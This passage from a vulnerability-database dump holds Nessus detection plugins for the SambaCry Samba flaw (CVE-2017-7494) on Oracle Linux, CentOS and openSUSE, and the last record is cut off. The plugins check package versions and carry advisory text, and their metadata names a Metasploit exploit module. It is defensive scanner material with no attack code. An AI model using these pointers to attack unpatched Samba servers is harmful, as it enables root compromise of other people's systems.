respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100397);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-7494\");\n script_xref(name:\"RHSA\", value:\"2017:1271\");\n\n script_name(english:\"Oracle Linux 6 : samba4 (ELSA-2017-1271) (SambaCry)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:1271 :\n\nAn update for samba4 is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. 
Upstream acknowledges steelo as the original reporter.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-May/006925.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"samba4-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-client-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-common-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-dc-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-dc-libs-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-devel-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-libs-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", 
reference:\"samba4-pidl-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-python-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-test-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-clients-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-krb5-locator-4.2.10-10.el6_9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:31:15", "description": "An update for samba4 is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. 
Upstream acknowledges steelo as the original reporter.", "edition": 38, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-26T00:00:00", "title": "CentOS 6 : samba4 (CESA-2017:1271) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-26T00:00:00", "cpe": ["p-cpe:/a:centos:centos:samba4-common", "p-cpe:/a:centos:centos:samba4-libs", "cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:samba4-pidl", "p-cpe:/a:centos:centos:samba4-winbind-krb5-locator", "p-cpe:/a:centos:centos:samba4-client", "p-cpe:/a:centos:centos:samba4-dc", "p-cpe:/a:centos:centos:samba4-devel", "p-cpe:/a:centos:centos:samba4-winbind", "p-cpe:/a:centos:centos:samba4", "p-cpe:/a:centos:centos:samba4-winbind-clients", "p-cpe:/a:centos:centos:samba4-dc-libs", "p-cpe:/a:centos:centos:samba4-test", "p-cpe:/a:centos:centos:samba4-python"], "id": "CENTOS_RHSA-2017-1271.NASL", "href": "https://www.tenable.com/plugins/nessus/100429", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1271 and \n# CentOS Errata and Security Advisory 2017:1271 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100429);\n script_version(\"3.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-7494\");\n script_xref(name:\"RHSA\", value:\"2017:1271\");\n\n script_name(english:\"CentOS 6 : samba4 (CESA-2017:1271) (SambaCry)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for samba4 is now available for Red Hat 
Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-May/022418.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?56ca4818\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7494\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright 
(C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-client-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-common-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-dc-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-dc-libs-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-devel-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-libs-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-pidl-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-python-4.2.10-10.el6_9\")) flag++;\nif 
(rpm_check(release:\"CentOS-6\", reference:\"samba4-test-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-clients-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-krb5-locator-4.2.10-10.el6_9\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:32:54", "description": "This update for samba fixes the following issue :\n\n - An unprivileged user with access to the samba server\n could cause smbd to load a specially crafted shared\n library, which then had the ability to execute arbitrary\n code on the server as 'root'. 
[CVE-2017-7494, bso#12780,\n bsc#1038231]\n\nThis update was imported from SUSE:SLE-12-SP1:Update project.\n\nNOTE: This update is released in openSUSE Leap 42.1 after its official\nEnd Of Life only because of its severity and potential impact for\nusers that have not migrated yet.\n\nPlease upgrade your openSUSE Leap 42.1 as soon as possible.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-30T00:00:00", "title": "openSUSE Security Update : samba (openSUSE-2017-618) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-30T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:samba-winbind-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc-devel", "p-cpe:/a:novell:opensuse:samba", "p-cpe:/a:novell:opensuse:ctdb", "p-cpe:/a:novell:opensuse:libsamba-util0", "p-cpe:/a:novell:opensuse:samba-client-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbldap0", "p-cpe:/a:novell:opensuse:samba-libs-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbldap0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsamba-policy0-32bit", "p-cpe:/a:novell:opensuse:libsamdb0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap-devel", "p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr-standard-devel", 
"p-cpe:/a:novell:opensuse:libsamba-passdb0", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit", "p-cpe:/a:novell:opensuse:libregistry0-debuginfo", "p-cpe:/a:novell:opensuse:samba-python-debuginfo", "p-cpe:/a:novell:opensuse:libregistry0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:opensuse:libgensec0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util-devel", "p-cpe:/a:novell:opensuse:libsamba-policy0", "p-cpe:/a:novell:opensuse:libndr-nbt-devel", "p-cpe:/a:novell:opensuse:libwbclient0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0", "p-cpe:/a:novell:opensuse:libsamdb0-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util0", "p-cpe:/a:novell:opensuse:libregistry0-32bit", "p-cpe:/a:novell:opensuse:samba-libs-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient-raw0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb-devel", "p-cpe:/a:novell:opensuse:libgensec0", "p-cpe:/a:novell:opensuse:libdcerpc-samr-devel", "p-cpe:/a:novell:opensuse:libsmbclient-raw0", "p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libregistry-devel", "p-cpe:/a:novell:opensuse:libndr-standard0", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-test", "p-cpe:/a:novell:opensuse:libsmbconf-devel", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo-32bit", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:libsmbclient-raw0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-32bit", "p-cpe:/a:novell:opensuse:samba-winbind", "p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-test-debuginfo", "p-cpe:/a:novell:opensuse:libgensec0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials-devel", 
"p-cpe:/a:novell:opensuse:libndr-standard0-32bit", "p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0", "p-cpe:/a:novell:opensuse:samba-client-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsamdb0", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac-devel", "p-cpe:/a:novell:opensuse:libsmbclient0", "p-cpe:/a:novell:opensuse:samba-libs-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0", "p-cpe:/a:novell:opensuse:libsamba-util-devel", "p-cpe:/a:novell:opensuse:libndr-devel", "p-cpe:/a:novell:opensuse:libgensec-devel", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit", "p-cpe:/a:novell:opensuse:samba-debugsource", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-32bit", "p-cpe:/a:novell:opensuse:samba-client", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-pidl", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc0", "p-cpe:/a:novell:opensuse:samba-winbind-32bit", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:libnetapi0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel", "p-cpe:/a:novell:opensuse:libsamdb-devel", 
"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo", "p-cpe:/a:novell:opensuse:samba-core-devel", "p-cpe:/a:novell:opensuse:libsmbclient-raw-devel", "p-cpe:/a:novell:opensuse:libsamba-credentials0", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-debuginfo", "p-cpe:/a:novell:opensuse:libgensec0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-test-devel", "p-cpe:/a:novell:opensuse:libsmbclient-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit", "p-cpe:/a:novell:opensuse:samba-libs", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libsmbclient-raw0-32bit", "p-cpe:/a:novell:opensuse:libsamba-policy-devel", "p-cpe:/a:novell:opensuse:libndr0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:ctdb-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwbclient0", "p-cpe:/a:novell:opensuse:samba-python", "p-cpe:/a:novell:opensuse:ctdb-devel", "p-cpe:/a:novell:opensuse:libdcerpc-binding0", "p-cpe:/a:novell:opensuse:libsmbldap0-debuginfo", "p-cpe:/a:novell:opensuse:libregistry0", "p-cpe:/a:novell:opensuse:libndr0", "p-cpe:/a:novell:opensuse:samba-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-devel", "p-cpe:/a:novell:opensuse:libsmbldap0-32bit", "p-cpe:/a:novell:opensuse:ctdb-tests", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit"], "id": "OPENSUSE-2017-618.NASL", "href": "https://www.tenable.com/plugins/nessus/100499", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# 
The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-618.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100499);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-7494\");\n\n script_name(english:\"openSUSE Security Update : samba (openSUSE-2017-618) (SambaCry)\");\n script_summary(english:\"Check for the openSUSE-2017-618 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for samba fixes the following issue :\n\n - An unprivileged user with access to the samba server\n could cause smbd to load a specially crafted shared\n library, which then had the ability to execute arbitrary\n code on the server as 'root'. 
[CVE-2017-7494, bso#12780,\n bsc#1038231]\n\nThis update was imported from SUSE:SLE-12-SP1:Update project.\n\nNOTE: This update is released in openSUSE Leap 42.1 after its official\nEnd Of Life only because of its severity and potential impact for\nusers that have not migrated yet.\n\nPlease upgrade your openSUSE Leap 42.1 as soon as possible.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1038231\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 